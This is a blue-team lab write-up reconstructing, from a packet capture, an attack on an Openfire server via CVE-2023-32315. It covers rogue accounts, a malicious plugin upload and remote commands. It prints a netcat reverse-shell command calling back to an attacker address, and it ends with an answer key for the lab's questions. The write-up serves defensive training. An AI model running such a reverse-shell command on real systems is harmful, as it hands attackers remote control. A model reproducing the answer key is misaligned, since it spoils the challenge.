// BTLO  ·  Incident Response

Breach

BTLO Easy Wireshark

Overview

TechNova Corp runs an Openfire-powered internal messaging server. The ShadowHunters threat group exploited a critical path traversal vulnerability in the Openfire admin console (CVE-2023-32315), gaining unauthenticated access to the admin panel, creating rogue accounts, uploading a malicious plugin for remote code execution, and ultimately establishing a reverse shell. The task is to analyse the provided PCAP in Wireshark and reconstruct the full attack chain.


Investigation

Initial Access — CVE-2023-32315

CVE-2023-32315 is a path traversal vulnerability in the Openfire administration console that allows an unauthenticated attacker to access restricted pages by manipulating the URL path. The attacker used this to reach the admin login panel without valid credentials and begin their operation.

Filtering HTTP traffic in Wireshark and following the TCP streams reveals the full attack chain in order.


Login — CSRF Token Extraction

The first captured request is a POST to the Openfire admin login endpoint. Inspecting the form data in Wireshark shows the CSRF token submitted with the login:

Form item: "csrf" = "VypyY6v0F1w8iNK"

The credentials used were admin:adminnothere. The CSRF token is required by the Openfire admin panel to prevent cross-site request forgery — the attacker extracted it from the login page before submitting the form.


Account Creation — T1136.001

With admin access established, the attacker created two new user accounts to maintain persistence in case the original access was revoked:

  • ix5768 — first account created
  • v01zxk — second account created

These are visible in Wireshark as POST requests to the Openfire user management endpoint, with the usernames visible in the form data.

The attacker then logged back in using v01zxk to continue operations — likely to avoid leaving traces on the original admin account session.


Plugin Upload — T1505.003

The most critical step in the chain is the upload of a malicious Openfire plugin. Openfire supports JAR-based plugins that extend server functionality — the attacker abused this legitimate feature to deploy a remote management tool.

Wireshark captures the multipart form upload with the filename clearly visible:

form-data; name="uploadfile"; filename="openfire-management-tool-plugin.jar"

The malicious JAR plugin maps to T1204.002 (User Execution: Malicious File) — once uploaded, the Openfire server loads and executes the JAR directly, treating it as a legitimate plugin while it silently provides the attacker with remote code execution capability.


Remote Code Execution — whoami

With the plugin active, the attacker used it to execute commands on the server. The first command sent was:

whoami

This is standard post-exploitation recon to confirm the execution context and identify what user the Openfire service is running as.


Reverse Shell — Netcat

Satisfied with RCE confirmation, the attacker established a persistent reverse shell using Netcat, connecting back to their machine at 192[.]168[.]18[.]160 on port 8888:

nc 192.168.18.160 8888 -e /bin/bash

The -e /bin/bash flag binds a bash shell to the connection, giving the attacker a fully interactive shell session on the Openfire server.


IOCs

Type Value
CVE CVE-2023-32315
IP 192[.]168[.]18[.]160
Port 8888
File openfire-management-tool-plugin.jar
Username ix5768
Username v01zxk
CSRF Token VypyY6v0F1w8iNK

Q1) What is the CSRF token value for the first login request? (Format: Token Value)
Click flag to reveal VypyY6v0F1w8iNK
Q2) What is the password of the first user who logged in? (Format: Password)
Click to reveal answer adminnothere
Q3) What is the first username that was created by the attacker? (Format: Username)
Click flag to reveal ix5768
Q4) How many accounts did the attacker create? (Format: Number)
Click to reveal answer 2
Q5) What is the MITRE technique ID for the above activity? (Format: XXXXX)
Click flag to reveal T1136
Q6) What is the username that the attacker used to log in to the admin panel? (Format: Username)
Click to reveal answer v01zxk
Q7) What is the name of the plugin that the attacker uploaded? (Format: Plugin Name)
Click flag to reveal openfire-management-tool-plugin.jar
Q8) What is the MITRE sub-technique ID for the above activity? (Format: XXXXX.XXX)
Click to reveal answer T1204.002
Q9) What is the first command that the user executes? (Format: Command)
Click flag to reveal whoami
Q10) Which tool did the attacker use to initiate the reverse shell? (Format: Tool)
Click to reveal answer netcat
Q11) On which port is the attacker listening? (Format: Port)
Click flag to reveal 8888
Q12) What is the CVE of this vulnerability of Openfire? (Format: CVE-XXXX-XXXXX)
Click to reveal answer CVE-2023-32315
🔒
// active lab
writeup locked
withheld in accordance with platform guidelines
to avoid spoiling live challenges.
password provided to recruiters on request.